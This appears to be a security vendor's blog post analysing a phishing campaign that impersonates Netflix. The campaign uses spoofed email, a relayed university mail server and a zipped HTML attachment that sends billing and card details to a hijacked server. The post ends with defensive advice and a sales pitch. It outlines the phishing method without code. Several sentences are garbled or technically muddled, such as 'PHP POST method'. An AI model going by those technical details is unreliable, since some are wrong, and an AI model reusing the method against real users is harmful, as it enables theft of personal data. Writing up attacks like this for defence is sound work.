How Netflix Bad Actors Went Behind The Scenes To Stage A Credential Harvesting Heist

What better place for a phish to hide than in a stream? A streaming service, that is. Streamable in more than 30 languages and 190 countries, Netflix is the largest on-demand movie and TV streaming service around. They’re also the focus of our latest phishing article.

Netflix has amassed over 220 million subscribers and advertises itself as a leading impersonator. Media reports have warned against numerous phishing threats over the years, many of which share a common theme regarding personal information. Phishers send emails in an attempt to trick Netflix users into updating their credit card information and other personally identifiable information (PII).

Earlier attempts at brand fraud included many tell-tale signs. Numerous typos, odd word choices, something that taunts URLs, and a strange appearance link bad actors to phishing emails. But with time, these particular indicators have become obsolete. Cybercrime gets more sophisticated every year, with no signs of slowing down. Today, many tell-tale signs of a brand impersonation are so cleverly hidden that even the most discerning eye can’t recognize them.

Recently Terraeagle found that Netflix was being impersonated in a PII data harvesting campaign utilizing malicious HTML attachments compressed in zip files.

The recipient of a phished message can exploit its local hosting on the target's machine instead of the world wide web. Typical URL background checks are bypassed, and phishing content cannot be seen because it isn't hosted online. Using ZIP files is another security benefit considering that it s not in an executable format that can be seen.

In this campaign, sender email addresses were spoofed to imitate Netflix's actual domain. The phishers were able to send these phishing emails to a mail server controlled by a Peruvian university.

In this example, the headers of the email (the current path of servers traversed by the email), the email originated from 43.157.12.254, and the attending university's spam emailing server accepted it before passing it to Microsoft Outlook servers. Using this transmission method, the emissary's phishing message was able to obtain a DKIM pass from an established university's domain.

Recipients were instructed to resolve an account issue by downloading a form attached to the email.

A zip file is the only attachment in this email, and clicking it unzips an HTML attachment that builds a PII (billing address, credit card info, date of birth, etc.)?harvesting form hosted on the recipient’s local machine.

By clicking the Agree and Continue button, you are risking sending this data to a bad actor. Close scrutiny of the code of the HTML file reveals that the PHP POST method is used to make the HTTP request with the header details from this recipient's local system to a third-party server under the control of a bad actor.

The action attribute specifies which server the data is sent to after submitting the form. In this case, it’s a hijacked server belonging to a Pakistan concrete manufacturing company.

Recap of Techniques

• Brand impersonation - uses brand logos and trademarks to impersonate well-known brands.
• Credential harvesting - occurs when a victim tries to log into what they think is the Netflix website but enters credentials into a form controlled by the phishers.
• Email spoofing - tricking recipients into thinking an email came from a company or person they trust.
• Abuse of a mail server - leverages a legitimate organization’s mail server to send phishing emails.
• Malicious HTML attachments - encouraging recipients to click on an attachment that harvests credentials skirts most anti-phishing technology.

Best Practices: Guidance and Recommendations

1. Be cautious of zip file attachments since these can’t be previewed. Use another form of communication to contact the sender and confirm the safety of the attachment.
2. An accounting issue can be resolved by visiting a company’s website directly instead of clicking on email attachments and links.
3. Use your browser’s address bar to hover over links and confirm that you’re on a website instead of a local file.
4. To prevent open mail relay abuse, SMTP servers should not be configured to accept and forward emails from non-local IP addresses to non-local mailboxes by unauthenticated and unauthorized users.

Fortunately, this story had a happy ending. But that’s not always the case. Without a third-party email security platform in place, your company could find itself playing a leading role in an upcoming phishing horror story.?Stay phish-free instead. Contact Terraeagle today.